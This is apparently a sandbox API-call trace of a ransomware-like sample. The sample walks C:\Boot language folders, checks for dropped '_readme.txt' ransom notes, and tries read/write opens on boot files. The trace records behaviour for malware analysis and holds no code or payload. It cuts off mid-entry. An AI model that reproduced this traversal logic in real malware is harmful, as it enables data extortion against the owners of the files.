[0097.183] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.183] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.185] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.186] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.186] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.187] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0097.187] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.187] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.187] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.187] PathFindFileNameW (pszPath="") returned="" [0097.187] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.188] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.188] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.188] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fff0 | out: hHeap=0x630000) returned 1 [0097.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0097.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.188] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0097.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.188] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0097.188] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.188] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.188] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.189] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.189] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.189] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0097.189] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.189] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1989b40, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0097.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.189] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned=".txt" [0097.189] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0097.189] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1989b40, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.189] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fde8 | out: hHeap=0x630000) returned 1 [0097.190] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fde8 [0097.190] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.190] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.190] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.191] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330270 | out: hHeap=0x630000) returned 1 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0097.192] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0097.192] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.192] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0097.192] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.192] PathFindFileNameW (pszPath="") returned="" [0097.192] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fff0 [0097.192] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0097.193] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0097.193] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0097.193] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0097.193] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0097.193] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330270 [0097.193] FreeLibrary (hLibModule=0x75670000) returned 1 [0097.193] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0097.193] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.193] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.193] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0097.193] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0097.193] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.193] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0097.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.194] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.194] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0097.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302e8 [0097.194] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0097.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302e8 | out: hHeap=0x630000) returned 1 [0097.194] PathFindExtensionW (pszPath="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned=".mui" [0097.194] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.194] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0097.194] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19afca0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, 